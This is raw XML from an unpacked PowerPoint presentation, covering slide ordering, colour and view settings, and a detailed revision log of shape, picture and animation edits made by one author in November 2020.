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5.jpg" ContentType="image/pn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466" r:id="rId2"/>
    <p:sldId id="469" r:id="rId3"/>
    <p:sldId id="515" r:id="rId4"/>
    <p:sldId id="463" r:id="rId5"/>
    <p:sldId id="494" r:id="rId6"/>
    <p:sldId id="492" r:id="rId7"/>
    <p:sldId id="493" r:id="rId8"/>
    <p:sldId id="495" r:id="rId9"/>
    <p:sldId id="496" r:id="rId10"/>
    <p:sldId id="470" r:id="rId11"/>
    <p:sldId id="497" r:id="rId12"/>
    <p:sldId id="498" r:id="rId13"/>
    <p:sldId id="499" r:id="rId14"/>
    <p:sldId id="500" r:id="rId15"/>
    <p:sldId id="501" r:id="rId16"/>
    <p:sldId id="516" r:id="rId17"/>
    <p:sldId id="517" r:id="rId18"/>
    <p:sldId id="510" r:id="rId19"/>
    <p:sldId id="509" r:id="rId20"/>
    <p:sldId id="518" r:id="rId21"/>
    <p:sldId id="505" r:id="rId22"/>
    <p:sldId id="512" r:id="rId23"/>
    <p:sldId id="503" r:id="rId24"/>
    <p:sldId id="504" r:id="rId25"/>
    <p:sldId id="511" r:id="rId26"/>
    <p:sldId id="519" r:id="rId27"/>
    <p:sldId id="506" r:id="rId28"/>
    <p:sldId id="507" r:id="rId29"/>
    <p:sldId id="513" r:id="rId30"/>
    <p:sldId id="508" r:id="rId31"/>
    <p:sldId id="481" r:id="rId32"/>
    <p:sldId id="514" r:id="rId33"/>
    <p:sldId id="476" r:id="rId34"/>
  </p:sldIdLst>
  <p:sldSz cx="14043025" cy="624205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1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="43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7B6"/>
    <a:srgbClr val="D957CA"/>
    <a:srgbClr val="0096FF"/>
    <a:srgbClr val="000468"/>
    <a:srgbClr val="001624"/>
    <a:srgbClr val="0EC088"/>
    <a:srgbClr val="000B4B"/>
    <a:srgbClr val="00006E"/>
    <a:srgbClr val="C91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5" autoAdjust="0"/>
    <p:restoredTop sz="56845" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="71" d="100"/>
          <a:sy n="71" d="100"/>
        </p:scale>
        <p:origin x="2016" y="78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1861"/>
        <p:guide pos="43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4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 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-13T06:50:03.454" v="6252"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:07:42.965" v="4526" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="463"/>
        </pc:sldMkLst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2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T07:29:05.528" v="3857" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="2" creationId="{1166F107-CAA2-4C28-BE32-DAA2FCE6E265}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:22:48.729" v="2395" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:38.482" v="3767" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:07:42.965" v="4526" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:26:31.703" v="3844" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="9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10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11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12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T08:25:37.389" v="4075" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="16" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:26:12.575" v="3812" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="17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18" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:21.940" v="3689" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="19" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T08:26:06.938" v="4103" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="20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21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22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25" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:23.123" v="3690" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="26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27" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:20.636" v="3688" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="28" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:24.427" v="3691" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="29" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:38.482" v="3767" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="32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33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34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35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36" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:38.482" v="3767" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="37" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:13.973" v="3687" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="38" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:25:38.482" v="3767" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="463"/>
            <ac:spMk id="39" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:24:28.254" v="3629" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="464"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:07:31.340" v="4514" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="469"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:07:23.838" v="4512" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="469"/>
            <ac:spMk id="700" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-09T11:14:20.311" v="124" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="469"/>
            <ac:spMk id="1395" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:07:31.340" v="4514" actId="14100"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="469"/>
            <ac:grpSpMk id="1388" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod ord modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:44:45.128" v="5214" actId="947"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="470"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T08:40:06.212" v="1197" actId="767"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="470"/>
            <ac:spMk id="4" creationId="{43358D48-F5FB-49B7-A169-1672649D180B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:44:45.128" v="5214" actId="947"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="470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0T08:39:43.915" v="1191" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="470"/>
            <ac:picMk id="3" creationId="{D7E3FB45-373B-44A0-B06F-BC87FDE698E3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T08:41:58.017" v="1204" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="470"/>
            <ac:picMk id="6" creationId="{3603B77B-431E-4787-AB59-EF675D0C1F06}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:22:37.457" v="3584" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="472"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp del mod">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:22:39.465" v="3585" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="473"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:08:55.233" v="3204"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="473"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del ord modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:22:44.300" v="3589" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="475"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T07:37:33.969" v="1176" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="479"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:22:40.491" v="3586" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="480"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod ord modAnim">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:17.953" v="5630" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="481"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T12:24:42.175" v="2139" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="2" creationId="{DFF50650-19FC-40EA-A1A3-0C8E37FF2114}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T12:24:15.997" v="2105" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="3" creationId="{E50E13DC-8297-4AFC-822C-9FDB8126A1B3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:14:02.209" v="3391" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="4" creationId="{8D504039-3F65-470A-A2B9-BF2D78BAFE86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:14:02.209" v="3391" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="5" creationId="{E9303EC2-78C3-4CC2-8B77-535D704550E2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T15:56:21.552" v="2220" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="6" creationId="{FE580FE5-F513-41A2-AE11-BBEAF7E11B0C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:10:22.296" v="2317" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="7" creationId="{18021295-357B-4C08-86B9-7EA9815F653D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:17:36.761" v="2383" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="8" creationId="{6D9F4524-A54D-42DB-A299-C59BE0E9D6A6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:10:22.296" v="2317" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="9" creationId="{3988E140-FDE7-491D-90C6-0F2376A47D95}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T16:21:52.028" v="2388" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="10" creationId="{AB78B182-FC70-475D-BCD5-7AAC7F2105E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:14:12.120" v="3392" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="11" creationId="{DECF0034-CAC0-44FA-B1DE-E442B3FEBAD1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:14:35.852" v="3395" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="12" creationId="{B6266446-7AEE-4183-9FA2-ACB98193A429}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:14:40.780" v="3397" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="13" creationId="{34D8F8BE-CF48-4FC0-BF7E-35358C724142}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:14:48.912" v="3400" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="14" creationId="{3287305B-CFF4-48C4-9278-F5FD8F23F376}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:15:12.223" v="3403" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="15" creationId="{A326DA89-546C-4922-81A2-991782219898}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T07:01:17.953" v="5630" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="481"/>
            <ac:spMk id="24" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:22:42.323" v="3587" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="482"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T07:37:35.644" v="1177" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="483"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-11T03:22:43.401" v="3588" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="491"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg modAnim modNotes">
        <pc:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-13T06:50:03.454" v="6252"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2246911181" sldId="492"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:19:22.007" v="4868" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492"/>
            <ac:spMk id="2" creationId="{18BC13FC-0ECF-4518-8C38-913D86632FF1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T01:57:42.065" v="252" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492"/>
            <ac:spMk id="2" creationId="{6EB321BF-49B1-4A55-B073-C86C76E0A2E0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:19:44.934" v="4887" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492"/>
            <ac:spMk id="3" creationId="{944998B1-5E79-45DA-930C-8F2D79FB4982}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T01:59:19.909" v="333" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492"/>
            <ac:spMk id="3" creationId="{B9A237E1-79D0-4929-8C76-5EA3EB447477}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T01:59:19.909" v="333" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492"/>
            <ac:spMk id="4" creationId="{0AB280B2-1AC0-4793-A78B-61D4200B5C89}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T01:59:19.909" v="333" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492"/>
            <ac:spMk id="5" creationId="{EDEAAC77-8E99-452F-86B4-1D0B6DA99F1D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-10T01:59:19.909" v="333" actId="22"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492"/>
            <ac:spMk id="6" creationId="{5D8F3A76-2B8B-4F03-8A36-9C1A6E17236A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="徐 博" userId="521935bdce9cec18" providerId="LiveId" clId="{AFADF40A-37CF-4EEC-9769-A1E7010769C6}" dt="2020-11-12T06:18:10.800" v="4775" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492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6:17:49.012" v="4756" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2246911181" sldId="492"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
